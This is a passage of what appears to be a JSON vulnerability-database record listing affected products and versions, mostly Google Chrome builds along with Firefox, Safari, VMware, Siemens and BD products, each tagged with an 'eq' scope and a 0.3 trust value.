        "vendor": "google",
        "version": "24.0.1312.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.570.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.17"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.536.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.313.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.351.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.887.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "30.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1288.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.36"
      },
      {
        "model": "content analysis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "2.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1498.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.793.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.151"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1301.0"
      },
      {
        "model": "facsvia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "pixel c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.205"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.29"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.8"
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1043.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1000.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "46.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.19"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.317"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.204"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.909.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.118"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.886.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.14"
      },
      {
        "model": "simatic ipc477e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.318"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.96"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.115"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.936.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.488.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.526.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.808.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.287.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.6"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "28.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.584.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1042.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.302.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.369.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.907.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.120"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "25.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.29"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1685.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.108"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.25"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "29.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.823.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.791.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.577.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "44.0.2403.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1061.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.91"
      },
      {
        "model": "simatic ipc347e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.676.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.210"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.525.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.490.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.681.0"
      },
      {
        "model": "viper lt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "pyxis procedurestation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.495.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.500.0"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.309"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.97"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.214"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1050"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.135"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.11"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.3.4"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.0.4419.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.416.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.950.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.8"
      },
      {
        "model": "sql server for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "200840"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.613.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.32"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.182.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1276.0"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.5.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.163"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.2.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1281.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1049.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.304"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.162"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.18"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.305"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.862.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.464.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.682.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.940.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.22"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.119"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1683.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.151"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.376.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1077.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1025"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.921.3"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.10"
      },
      {
        "model": "workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "12.5.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.54"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.155"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.538.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.519.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1041.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.69"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.0.1"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017030"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.561.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1306.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1311.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.586.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.928.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.93"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.766.0"
      },
      {
        "model": "simatic ipc677c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.28"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.34"
      },
      {
        "model": "vcloud usage meter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.740.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.125"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.50"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.603.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.45"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.529.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.95"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "4.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.399.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.203"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.126"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.830.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.131"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.687.1"
      },
      {
        "model": "chrome beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.249.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.335.2"
      },
      {
